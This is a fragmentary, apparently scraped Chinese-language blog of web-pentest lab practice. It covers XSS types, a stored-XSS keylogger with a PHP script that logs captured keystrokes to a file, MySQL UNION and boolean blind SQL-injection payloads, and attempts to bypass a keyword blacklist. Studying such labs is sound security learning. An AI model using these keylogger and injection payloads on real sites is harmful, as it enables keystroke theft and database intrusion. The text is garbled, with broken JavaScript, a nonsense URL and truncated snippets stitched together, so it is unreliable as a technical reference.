0x01反射型
可以看見什麼都沒有過濾0x02儲存型xss
那麼可以看見也是成功了 那我們試試可不可以順著網線搞一下組員吶??? 算了 沒得伺服器 搞搞自己吧
document.onkeypress=function(evt)}
<?php攻擊語句$key=$_post['
key'
];$logfile="
keylog.txt";
$fp = fopen($logfile,"a"
);fwrite($fp,$key);
fclose($fp);
?>
"">誘人字眼
然後隨便敲擊 成功寫入
0x03dom型
成功
大哥帶我們的mysql注入
這是今天的任務union select 查詢語句 第一步是先構造閉合 加入單引號報錯 然後 更據and 1 1 and1 2看是字元型還是布林型注入 www.薩達所大大所多t index.php?id 1 20order 20by 205 資料庫test查詢所有資料庫 要求是讀取web埠的admin...
大哥帶我們的mysql注入 基於bool的盲注
盲注 那麼我們來了解一點盲注的語法 這裡面是語法的介紹 0x01第一步我們先判斷當前資料庫的長度 語法構造 index.php?id 1 20and 20length select 20database 3e3 正確 index.php?id 1 and length select database...
大哥帶我走滲透5 南方資料
1.用腳都知道,這次的注入肯定不簡單。果然,新增了無數的坑 哭泣委屈 不過還是謝謝大哥,如果沒有他,我們根本不能有這麼好的學習環境。好好加油吧。果然,設定了黑名單。加入黑名單的有我們的and還有 所以我們要變一下身 and.居然大寫也不行。a nd也不行。andand也不行。一看 別人是黑名單。我在...